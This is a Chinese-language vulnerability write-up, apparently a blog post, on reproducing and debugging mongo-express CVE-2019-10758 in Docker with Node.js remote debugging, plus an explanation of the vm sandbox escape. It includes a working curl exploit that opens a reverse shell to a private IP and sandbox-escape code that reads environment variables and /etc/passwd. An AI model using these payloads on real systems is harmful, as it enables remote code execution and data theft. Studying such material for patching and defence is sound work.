搭建調試環境,調試 CVE-2019-10758 漏洞,學習nodejs 沙箱繞過,以及nodejs 遠程調試。目前網上關於該漏洞的基於docker的遠程調試分析寫的很泛,本文從初學者角度分析調試漏洞成因,特別是在chrome瀏覽器調試nodejs上花了點篇幅。
0x01 認識 mongo-express
mongo-express是一個MongoDB的Admin Web管理界面,使用NodeJS、Express、Bootstrap3編寫而成。目前mongo-express應該是Github上Star最多的MongoDB admin管理界面。部署方便,使用簡單,成爲了很多人管理mongo的選擇。
0x02 調試環境搭建
0x1 啓動docker服務
閱讀官方GitHub的安全公告,我們發現漏洞影響0.54.0以下的所有版本。選擇以0.49爲例進行測試,由於此漏洞環境還需要MongoDB數據庫,我們可以通過執行以下docker命令進行快速搭建:
搭建MongoDB數據庫
docker run --name test -d mongo:3.2
搭建包含漏洞的mongo-express並且連接到上面的MongoDB數據庫:
docker run -d -p 8081:8081 --link test:mongo mongo-express:0.49
查看日誌,確認連接成功。
0x2 開啓nodejs調試選項
這裏需要個技巧,如果要調試nodejs 需要在啓動的時候加上 --inspect 參數。在docker啓動腳本做以下修改
docker restart 183
利用docker exec -it 183 bash連接docker查看debug服務是否開啓
如上圖中開啓9229端口即可。只需要外面主機能夠連接訪問9229端口就可以利用chrome插件進行調試,可以用frp將端口轉發出來,或者利用docker -p 9229:9229參數做處理。
0x3 Chrome DevTools
利用chrome 插件可以實現像調試javascript腳本一樣調試nodejs,操作起來也是很方便。
首先下載debug插件
在chrome打開about:inspectchrome devtools在2016年5月就已經支持Nodejs的調試,點擊Open dedicated DevTools for Node
配置連接地址和端口
接下來就像調試js一樣了
發送一個測試包,該路由分支可以斷下,接下來就開始調試本次漏洞了。
curl http://127.0.0.1:8081/checkValid -d 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("bash -i >& /dev/tcp/192.168.43.176/8003 0>&1 2>&1")'
0x03 漏洞調試及原理分析
本次調試的漏洞原理比較簡單,核心漏洞是命令拼接,這是一種最簡單的漏洞形式,但是利用起來需要點功夫,因爲需要繞過沙箱VM,好在nodejs的vm繞過有過研究基礎。多的不說,直接看最後的漏洞代碼
string爲toBSON的參數,在MongoDB中BSON是一種常見的數據格式,與JSON是近親,但是和JSON的數據格式有很多區別,而然在mongo-express中的所有和BSON相關的操作,如新建一個文檔(類似其他數據庫的插入操作)都需要通過toBSON()函數。
例如下面操作
當代碼流程走到bson.toBSON時會觸發eval函數,因爲nodejs可以作爲後端語言所以該eval函數是在服務器端運行,可以造成命令注入,對系統產生危害
exp.checkValid = function (req, res) {
var doc = req.body.document;
try {
bson.toBSON(doc);
} catch (err) {
console.error(err);
return res.send('Invalid');
}
res.send('Valid');
};
exports.toBSON = function (string) {
var sandbox = exports.getSandbox();
string = string.replace(/ISODate\(/g, 'new ISODate(');
string = string.replace(/Binary\(("[^"]+"),/g, 'Binary(new Buffer($1, "base64"),');
vm.runInNewContext('doc = eval((' + string + '));', sandbox);
return sandbox.doc;
};
由代碼溯源分析得到,toBSON的參數string是req.body中的document,因此這一部分我們可控。可以發現vm.runInNewContext函數,這是一個虛擬沙箱。因此們下一節分析怎麼繞過沙箱防護。
0x04 nodejs 沙箱繞過
沙箱是一個能夠安全執行不受信任的代碼,且不影響外部實際代碼的獨立環境。在沙箱裏代碼執行往往會被限制。VM模塊提供在VM虛擬機上下文中編譯運行代碼的API。使用VM模塊可以在沙箱環境中運行代碼。運行的代碼使用不同的V8上下文,也就是它的全局變量不同於其他代碼。但是沙箱裏的代碼仍然可以訪問Node進程。我們經常使用該方法去繞過。
0x1 現象
vm.js
"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`this.constructor.constructor('return this.process.env')()`);
console.log(xyz);
可以看到this.process.env獲取到了nodejs進程的信息,這說明完全可以切回主程序去執行系統命令。
0x2 解釋
在javascript中this指向它所屬的對象,所以我們使用它時就已經指向了一個VM上下文之外的對象。那麼訪問this的 .constructor 就返回 Object Constructor ,訪問 Object Constructor 的 .constructor 返回 Function constructor 。Function constructor 就像javascript裏的最高函數它允許全局訪問。Function constructor允許從字符串生成函數,從而執行任意代碼。所以我們可以利用它返回主進程。之後我們就能用它來訪問主進程,然後進行RCE。
"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);
同理vm2 函數也可以繞過,這裏還是參照原文進行學習吧
https://pwnisher.gitlab.io/nodejs/sandbox/2019/02/21/sandboxing-nodejs-is-hard.html
0x05 漏洞修補
這裏放兩個圖可以說明一切,利用mongo-query-parser 去解析BSON數據,直接從根源替換。
0x06 參考文獻
https://segmentfault.com/a/1190000011951679
https://nodejs.org/en/docs/guides/debugging-getting-started/
https://mntn0x.github.io/2020/01/08/mongo-express-RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/#mongo-amp-amp-mongo-express
DoraBox之代碼執行
https://www.hetianlab.com/expc.do?ec=ECID7423-09b9-4af1-a095-da05fe4962ec
(通過DoraBox靶場系列闖關練習,理解代碼執行及命令執行漏洞的原理與利用過程。)
歡迎投稿至郵箱:[email protected]
有才能的你快來投稿吧!
投稿細則都在裏面了,點擊查看哦
